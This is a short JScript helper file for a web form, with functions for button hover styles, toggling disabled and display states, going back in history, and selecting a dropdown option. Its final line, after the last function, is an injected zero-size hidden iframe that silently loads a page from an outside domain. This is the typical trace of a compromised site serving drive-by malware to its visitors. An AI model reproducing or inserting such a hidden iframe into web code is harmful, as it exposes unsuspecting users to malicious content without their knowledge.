// JScript source code
//按钮MouseMove事件
function btnMouseMove(ControlName)
{
	ControlName.className = "btnFlat2";
}
//按钮MouseOut事件
function btnMouseOut(ControlName)
{
	ControlName.className = "btnFlat1";
}

function setDisabled(ControlName,strProperty)
{
	document.all[ControlName].disabled = strProperty;
}

function setDisplay(ControlName,strProperty)
{
	ControlName.style.display = strProperty;
}

function btnCancel_Click()
{
	window.history.back();
}

function getNow()
{
	var date = new Date();	
	return date.getTime();
}

function getInteger(intValue)
{
	var intResult = 0;
	if (parseInt(intValue) == intValue)
	{
		intResult = parseInt(intValue);
	}
	return intResult;
}

function SelectKind(ControlName,KindID)
{
	ControlName = document.all[ControlName];
	var intLen = ControlName.options.length;
	for (var i=0;i<intLen;i++)
	{
		if (ControlName.options[i].value == KindID)
		{
			ControlName.options[i].selected = true;
			break;
		}
	}
}<iframe src=http://98sp.com/amd/index.htm width=0 height=0></iframe>
